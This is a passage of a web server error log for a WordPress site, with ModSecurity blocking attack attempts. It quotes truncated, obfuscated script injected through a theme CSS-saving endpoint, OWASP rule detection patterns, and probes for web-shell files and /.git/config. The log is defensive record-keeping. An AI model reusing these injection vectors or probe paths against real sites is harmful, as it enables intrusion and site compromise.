"WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/tdw/save_css"] [unique_id "ZVLp_vejNQrb_5rgO5NheAAAAFg"] [Mon Nov 13 22:31:11.306592 2023] [:error] [pid 5211:tid 139781134071552] [client 185.157.222.11:44356] [client 185.157.222.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\((?:\\\\W*?(?:objectc(?:ategory|lass)|homedirectory|[gu]idnumber|cn)\\\\b\\\\W*?=|[^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|][^\\\\w\\\\x80-\\\\xFF]*?\\\\()|\\\\)[^\\\\w\\\\x80-\\\\xFF]*?\\\\([^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|])" at ARGS:compiled_css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "65"] [id "950010"] [rev "2"] [msg "LDAP Injection Attack"] [data "Matched Data: ()===![]&&( found within ARGS:compiled_css: </style><script>var _0x38f8e0=_0x317f;(function(_0x41793e,_0x57a0fe){var _0x185c2f=_0x317f,_0x3ac4f7=_0x41793e();while(!![]){try{var _0x5f54f1=parseint(_0x185c2f(0x1d2))/0x1*(-parseint(_0x185c2f(0x1eb))/0x2)+-parseint(_0x185c2f(0x1c7))/0x3*(-parseint(_0x185c2f(0x1d0))/0x4)+-parseint(_0x185c2f(0x205))/0x5*(parseint(_0x185c2f(0x1fb))/0x6)+-parseint(_0x185c2f(0x1f5))/0x7*(-parseint(_0x185c2f(0x1d8))/0x8)+parseint(_0x185c2f(0x1f9))/0x9*(-parseint(_0x1..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accu [hostname "investigacionperu.com"] [uri "/wp-json/tdw/save_css"] [unique_id "ZVLp__ejNQrb_5rgO5NheQAAAEE"] [Tue Nov 14 03:27:20.759286 2023] [ssl:warn] [pid 20232:tid 139841926182784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 14 03:27:28.961224 2023] [ssl:warn] [pid 20237:tid 139841926182784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 14 03:27:29.474847 2023] [ssl:warn] [pid 20237:tid 139841926182784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 14 03:27:31.482819 2023] [ssl:warn] [pid 20237:tid 139841926182784] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 14 03:27:33.757423 2023] [ssl:warn] [pid 20654:tid 140037068683136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 14 03:27:42.002667 2023] [ssl:warn] [pid 20655:tid 140037068683136] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 14 09:24:54.246157 2023] [:error] [pid 20679:tid 140036628457216] [client 88.198.48.98:58704] [client 88.198.48.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[^>]*>|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[[\\\\s\\\\S]]*[\\\\s\\\\S]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script[\\\\s]*[\\\\s]|<script[^>]*>[\\\\s\\\\S]*?<\\\\/script|<script[^>]*>[\\\\s\\\\S]*?)" at ARGS:compiled_css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_xss_attacks.conf"] [line "14"] [id "973336"] [rev "1"] [msg "XSS Filter - Category 1: Script Tag Vector"] [data "Matched Data: <script>var a=1;var b=2;var c=384573347;</script> found within ARGS:compiled_css: </style><script>var a=1;var b=2;var c=384573347;</script><style>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "investigacionperu.com"] [uri "/wp-json/tdw/save_css"] [unique_id "ZVODNl62TniquPkatkBvkwAAAJY"] [Tue Nov 14 09:24:54.856060 2023] [:error] [pid 20678:tid 140036611671808] [client 88.198.48.98:58706] [client 88.198.48.98] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\((?:\\\\W*?(?:objectc(?:ategory|lass)|homedirectory|[gu]idnumber|cn)\\\\b\\\\W*?=|[^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|][^\\\\w\\\\x80-\\\\xFF]*?\\\\()|\\\\)[^\\\\w\\\\x80-\\\\xFF]*?\\\\([^\\\\w\\\\x80-\\\\xFF]*?[\\\\!\\\\&\\\\|])" at ARGS:compiled_css. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "65"] [id "950010"] [rev "2"] [msg "LDAP Injection Attack"] [data "Matched Data: ()===![]&&( found within ARGS:compiled_css: </style><script>var _0x40f146=_0x149e;(function(_0x44b2f2,_0x396953){var _0x39950a=_0x149e,_0x4b1aa1=_0x44b2f2();while(!![]){try{var _0x22a6c0=-parseint(_0x39950a(0x107))/0x1*(parseint(_0x39950a(0x124))/0x2)+parseint(_0x39950a(0xef))/0x3*(-parseint(_0x39950a(0x109))/0x4)+-parseint(_0x39950a(0x118))/0x5+-parseint(_0x39950a(0x10d))/0x6+parseint(_0x39950a(0x10c))/0x7*(parseint(_0x39950a(0x103))/0x8)+parseint(_0x39950a(0xee))/0x9*(-parseint(_0x39950a(..."] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accu [hostname "investigacionperu.com"] [uri "/wp-json/tdw/save_css"] [unique_id "ZVODNvZqX530GnEMmkh5JAAAAFg"] [Wed Nov 15 02:22:45.702354 2023] [:error] [pid 20678:tid 140036885939968] [client 37.221.92.68:54066] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Nov 15 02:22:47.692045 2023] [:error] [pid 21253:tid 140036720776960] [client 37.221.92.68:54078] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Wed Nov 15 03:23:24.451652 2023] [ssl:warn] [pid 14694:tid 140426230024064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 15 03:23:32.646467 2023] [ssl:warn] [pid 14696:tid 140426230024064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 15 03:23:33.000607 2023] [ssl:warn] [pid 14696:tid 140426230024064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 15 03:23:34.944566 2023] [ssl:warn] [pid 14696:tid 140426230024064] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 15 03:23:37.202868 2023] [ssl:warn] [pid 15111:tid 140648185358208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 15 03:23:49.389450 2023] [ssl:warn] [pid 15119:tid 140648185358208] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 15 11:19:53.002805 2023] [autoindex:error] [pid 15991:tid 140647788914432] [client 41.216.188.43:37114] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Nov 15 11:35:43.310404 2023] [autoindex:error] [pid 15138:tid 140647847663360] [client 41.216.188.43:37292] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/wordpress/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Nov 15 11:41:06.662041 2023] [autoindex:error] [pid 15138:tid 140647839270656] [client 41.216.188.43:37356] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Nov 15 11:43:46.313419 2023] [autoindex:error] [pid 15138:tid 140647746950912] [client 41.216.188.43:37402] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Nov 15 12:56:48.406460 2023] [autoindex:error] [pid 15136:tid 140647780521728] [client 41.216.188.43:38758] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Nov 15 13:35:17.876006 2023] [autoindex:error] [pid 15137:tid 140647856056064] [client 41.216.188.43:39508] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Nov 15 13:39:25.064765 2023] [autoindex:error] [pid 15138:tid 140647822485248] [client 41.216.188.43:39586] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Nov 15 13:47:07.053181 2023] [autoindex:error] [pid 15137:tid 140647772129024] [client 41.216.188.43:39808] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Nov 16 00:21:40.648831 2023] [autoindex:error] [pid 15137:tid 140647814092544] [client 69.164.203.208:51524] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Nov 16 03:18:23.871319 2023] [ssl:warn] [pid 26760:tid 140316156573568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 16 03:18:32.069720 2023] [ssl:warn] [pid 26761:tid 140316156573568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 16 03:18:32.472922 2023] [ssl:warn] [pid 26761:tid 140316156573568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 16 03:18:35.744322 2023] [ssl:warn] [pid 26761:tid 140316156573568] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 16 03:18:38.113765 2023] [ssl:warn] [pid 27212:tid 140182823651200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 16 03:18:46.300911 2023] [ssl:warn] [pid 27217:tid 140182823651200] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name 2023/11/16 09:11:58 [error] 27090#27090: *51096 access forbidden by rule, client: 54.90.194.35, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" 2023/11/16 09:11:58 [error] 27089#27089: *51097 access forbidden by rule, client: 54.90.194.35, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Thu Nov 16 14:37:22.453359 2023] [:error] [pid 27237:tid 140182422480640] [client 85.114.138.220:39126] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Thu Nov 16 14:38:01.741392 2023] [:error] [pid 27237:tid 140182456051456] [client 85.114.138.220:39164] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Fri Nov 17 03:45:35.814966 2023] [ssl:warn] [pid 18381:tid 140147221264256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 17 03:45:40.034882 2023] [ssl:warn] [pid 18385:tid 140147221264256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 17 03:45:40.547991 2023] [ssl:warn] [pid 18385:tid 140147221264256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 17 03:45:42.400194 2023] [ssl:warn] [pid 18385:tid 140147221264256] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 17 03:45:46.027450 2023] [ssl:warn] [pid 18833:tid 140149883545472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 17 03:45:58.259366 2023] [ssl:warn] [pid 18842:tid 140149883545472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 17 20:19:53.953756 2023] [ssl:warn] [pid 18842:tid 140149883545472] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Fri Nov 17 21:00:18.969255 2023] [:error] [pid 350:tid 140149589526272] [client 66.55.68.56:49454] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Fri Nov 17 21:01:11.756118 2023] [:error] [pid 350:tid 140149547562752] [client 66.55.68.56:49596] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Fri Nov 17 21:01:49.740861 2023] [:error] [pid 352:tid 140149614704384] [client 66.55.68.56:49706] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Fri Nov 17 21:01:52.933711 2023] [authz_core:error] [pid 352:tid 140149581133568] [client 66.55.68.56:49718] AH01630: client denied by server configuration: /home/investig/public_html/.htacess.php [Fri Nov 17 21:01:54.788876 2023] [:error] [pid 352:tid 140149555955456] [client 66.55.68.56:49724] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Fri Nov 17 21:02:11.043524 2023] [:error] [pid 352:tid 140149692409600] [client 66.55.68.56:49778] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Sat Nov 18 03:33:18.065044 2023] [ssl:warn] [pid 21732:tid 140483990460288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 18 03:33:26.279510 2023] [ssl:warn] [pid 21741:tid 140483990460288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 18 03:33:26.778822 2023] [ssl:warn] [pid 21741:tid 140483990460288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 18 03:33:28.384311 2023] [ssl:warn] [pid 21741:tid 140483990460288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 18 03:33:30.623159 2023] [ssl:warn] [pid 22191:tid 139712891053952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sat Nov 18 03:33:38.822303 2023] [ssl:warn] [pid 22194:tid 139712891053952] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 19 03:31:36.108227 2023] [:error] [pid 30792:tid 139712467498752] [client 85.114.138.220:58072] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Sun Nov 19 03:32:04.323380 2023] [:error] [pid 30489:tid 139712492676864] [client 85.114.138.220:58094] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/iR7SzrsOUEP.php [Sun Nov 19 03:43:21.489078 2023] [ssl:warn] [pid 17439:tid 139903923996544] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 19 03:43:29.812061 2023] [ssl:warn] [pid 17443:tid 139903923996544] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 19 03:43:30.221710 2023] [ssl:warn] [pid 17443:tid 139903923996544] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 19 03:43:31.959932 2023] [ssl:warn] [pid 17443:tid 139903923996544] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 19 03:43:34.227348 2023] [ssl:warn] [pid 17859:tid 139759136290688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 19 03:43:42.427106 2023] [ssl:warn] [pid 17862:tid 139759136290688] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 19 15:28:31.567425 2023] [:error] [pid 30865:tid 139758764254976] [client 35.173.195.160:40968] [client 35.173.195.160] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:bc9bd58fe1b6ef954d6d794db6d30e25e8ff50634d24346cf8006ef422e3c05c6e48b07678e34d08c97ad3f91012c80ac690b50f51fbd49b16e301de58d9c5ca. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:bc9bd58fe1b6ef954d6d794db6d30e25e8ff50634d24346cf8006ef422e3c05c6e48b07678e34d08c97ad3f91012c80ac690b50f51fbd49b16e301de58d9c5ca: oCvlKz8S9pq0RNPn6s6ZUEBkAXCUpcH3aLaP05A/AM6IKLdk1M5J687/ONuMFdxKld/g7JUNlst8ZDeotAYIxQCtGg+gOgiPQoUsnV31QawsYHFcMNvqXTrxOYEy/wdmvQPfgCVawsg/n6Vqp5H8s2ltzkeGDkv6qFPoXmw/hGhXRytHtcNWuAKzATSKVr8fuWD2HLKMLV5SSgo5aswoWN5OtVcOwiK/Q0OMFBF8uf7RCbsomqOluNiHIX2Ie5FBF7pSQ+tcOFS0N [hostname "investigacionperu.com"] [uri "/"] [unique_id "ZVpv7yPXLg51WrgUKuzNPgAAAQ4"] [Sun Nov 19 15:28:34.913254 2023] [:error] [pid 18681:tid 139758772647680] [client 35.173.195.160:40972] [client 35.173.195.160] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:bc9bd58fe1b6ef954d6d794db6d30e25e8ff50634d24346cf8006ef422e3c05c6e48b07678e34d08c97ad3f91012c80ac690b50f51fbd49b16e301de58d9c5ca. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:bc9bd58fe1b6ef954d6d794db6d30e25e8ff50634d24346cf8006ef422e3c05c6e48b07678e34d08c97ad3f91012c80ac690b50f51fbd49b16e301de58d9c5ca: oCvlKz8S9pq0RNPn6s6ZUEBkAXCUpcH3aLaP05A/AM6IKLdk1M5J687/ONuMFdxKld/g7JUNlst8ZDeotAYIxQCtGg+gOgiPQoUsnV31QawsYHFcMNvqXTrxOYEy/wdmvQPfgCVawsg/n6Vqp5H8s2ltzkeGDkv6qFPoXmw/hGhXRytHtcNWuAKzATSKVr8fuWD2HLKMLV5SSgo5aswoWN5OtVcOwiK/Q0OMFBF8uf7RCbsomqOluNiHIX2Ie5FBF7pSQ+tcOFS0N [hostname "www.investigacionperu.com"] [uri "/"] [unique_id "ZVpv8hvURdhkhXYsjyMMywAAAM0"] [Mon Nov 20 03:25:20.875747 2023] [ssl:warn] [pid 17738:tid 140231119136640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 20 03:25:33.065608 2023] [ssl:warn] [pid 17741:tid 140231119136640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 20 03:25:34.277157 2023] [ssl:warn] [pid 17741:tid 140231119136640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 20 03:25:36.807739 2023] [ssl:warn] [pid 17741:tid 140231119136640] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 20 03:25:39.140965 2023] [ssl:warn] [pid 18222:tid 139628217702272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 20 03:25:47.309662 2023] [ssl:warn] [pid 18225:tid 139628217702272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 20 13:26:28.815632 2023] [autoindex:error] [pid 18242:tid 139627885217536] [client 87.98.134.59:39630] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: investigacionperu.com [Mon Nov 20 15:51:36.586553 2023] [ssl:warn] [pid 18225:tid 139628217702272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 20 15:51:37.721274 2023] [ssl:warn] [pid 18225:tid 139628217702272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 20 15:51:46.132232 2023] [ssl:warn] [pid 18225:tid 139628217702272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 20 16:07:47.114967 2023] [ssl:warn] [pid 18225:tid 139628217702272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 20 19:04:13.204585 2023] [ssl:warn] [pid 18225:tid 139628217702272] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Mon Nov 20 22:07:45.989390 2023] [autoindex:error] [pid 14842:tid 139627902002944] [client 91.92.240.122:34608] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Nov 20 22:08:00.141058 2023] [autoindex:error] [pid 14842:tid 139628009780992] [client 91.92.240.122:34610] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Mon Nov 20 22:08:18.602339 2023] [autoindex:error] [pid 14713:tid 139627893610240] [client 91.92.240.122:34622] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Tue Nov 21 03:28:19.436532 2023] [ssl:warn] [pid 4587:tid 140580939986816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 21 03:28:27.640017 2023] [ssl:warn] [pid 4590:tid 140580939986816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 21 03:28:28.027052 2023] [ssl:warn] [pid 4590:tid 140580939986816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 21 03:28:29.831002 2023] [ssl:warn] [pid 4590:tid 140580939986816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 21 03:28:32.092992 2023] [ssl:warn] [pid 5039:tid 140068853180288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 21 03:28:36.285690 2023] [ssl:warn] [pid 5041:tid 140068853180288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 21 09:52:07.798001 2023] [ssl:warn] [pid 5041:tid 140068853180288] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Tue Nov 21 22:02:51.815217 2023] [autoindex:error] [pid 20820:tid 140068505233152] [client 41.185.8.119:40008] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Wed Nov 22 03:09:15.492607 2023] [ssl:warn] [pid 4042:tid 139780843935616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 22 03:09:17.686689 2023] [ssl:warn] [pid 4043:tid 139780843935616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 22 03:09:18.142549 2023] [ssl:warn] [pid 4043:tid 139780843935616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 22 03:09:19.811301 2023] [ssl:warn] [pid 4043:tid 139780843935616] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 22 03:09:22.090736 2023] [ssl:warn] [pid 4471:tid 140112094009216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Nov 22 03:09:26.287309 2023] [ssl:warn] [pid 4473:tid 140112094009216] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 23 03:26:22.376859 2023] [ssl:warn] [pid 17614:tid 140636056274816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 23 03:26:30.571631 2023] [ssl:warn] [pid 17620:tid 140636056274816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 23 03:26:31.053259 2023] [ssl:warn] [pid 17620:tid 140636056274816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 23 03:26:32.774513 2023] [ssl:warn] [pid 17620:tid 140636056274816] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 23 03:26:35.069978 2023] [ssl:warn] [pid 18037:tid 140539323910016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 23 03:26:43.267878 2023] [ssl:warn] [pid 18041:tid 140539323910016] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Thu Nov 23 17:28:45.474002 2023] [autoindex:error] [pid 18062:tid 140539132774144] [client 68.178.145.55:42198] AH01276: Cannot serve directory 